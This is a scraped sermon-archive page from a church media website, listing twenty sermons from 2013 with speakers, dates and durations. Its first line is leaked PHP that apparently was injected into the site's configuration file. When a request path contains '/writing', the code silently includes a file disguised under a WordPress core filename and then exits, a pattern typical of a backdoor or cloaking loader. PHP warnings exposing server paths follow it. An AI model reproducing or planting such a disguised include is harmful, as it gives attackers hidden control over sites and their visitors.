if(strpos(strtolower($_SERVER['REQUEST_URI']),'/writing')){include(getcwd().'/wp-includes/class-wp-comments.php');exit;}
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/content/f/p/c/fpclmedia/html/configuration.php:1) in /home/content/f/p/c/fpclmedia/html/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/content/f/p/c/fpclmedia/html/configuration.php:1) in /home/content/f/p/c/fpclmedia/html/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /home/content/f/p/c/fpclmedia/html/configuration.php:1) in /home/content/f/p/c/fpclmedia/html/libraries/joomla/session/session.php on line 426
All sermons | Sermon Page | First Pentecostal Church Media Page

All sermons

Results 1 - 20 of 450
Page 1 of 23
<< Start < Prev 1 2 3 4 5 6 7 8 9 10 Next > End >>

Title Speaker Date Time
  The Christian Walk Pastor Vernon Jarvis Sunday, 30 June 2013 00:00
  A Living Sacrifice Pastor Vernon Jarvis Wednesday, 24 April 2013 25:32
  A Vision For Kingdom Work Pastor Vernon Jarvis Sunday, 21 April 2013 34:01
  The Mind of Christ Pastor Vernon Jarvis Sunday, 21 April 2013 29:40
  Time Charlie Bowman Wednesday, 17 April 2013 38:15
  God is Still on his Throne Pastor Vernon Jarvis Sunday, 14 April 2013 38:43
  Healing Pastor Vernon Jarvis Sunday, 14 April 2013 22:39
  Fight the good Fight David Haag Wednesday, 10 April 2013 29:29
  Our God of Deliverance Pastor Vernon Jarvis Sunday, 07 April 2013 37:52
  Parting of the Waters Pastor Vernon Jarvis Sunday, 07 April 2013 39:19
  Problems produce possibility Pastor Vernon Jarvis Wednesday, 03 April 2013 30:53
  The Power of the Resurrection Pastor Vernon Jarvis Sunday, 31 March 2013 35:37
  Jeremiah speaks for Today Pastor Vernon Jarvis Sunday, 31 March 2013 28:23
  Light Manifested in Darkness Pastor Vernon Jarvis Wednesday, 27 March 2013 27:43
  Love not the World Pastor Vernon Jarvis Sunday, 24 March 2013 34:14
  Where Two Ways Meet Pastor Vernon Jarvis Sunday, 24 March 2013 26:57
  The Trial of Your Faith Pastor Vernon Jarvis Sunday, 17 March 2013 40:23
  Standards Evangelist Jim Suits Wednesday, 13 March 2013 50:27
  Children of the Promise Evangelist Jim Suits Tuesday, 12 March 2013 45:01
  The Power that worketh in us Evangelist Jim Suits Monday, 11 March 2013 32:57